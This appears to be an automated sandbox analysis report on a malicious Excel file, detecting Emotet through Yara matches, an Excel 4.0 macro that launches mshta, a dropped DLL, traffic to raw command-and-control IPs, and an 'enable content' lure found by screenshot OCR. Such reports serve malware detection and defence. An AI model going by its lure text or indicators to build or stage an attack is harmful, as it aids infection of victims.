                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com\<4& equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: imedpub_6.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: imedpub_6.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Document contains OLE streams with names of living off the land binaries
                            Source: imedpub_6.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Source: imedpub_6.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
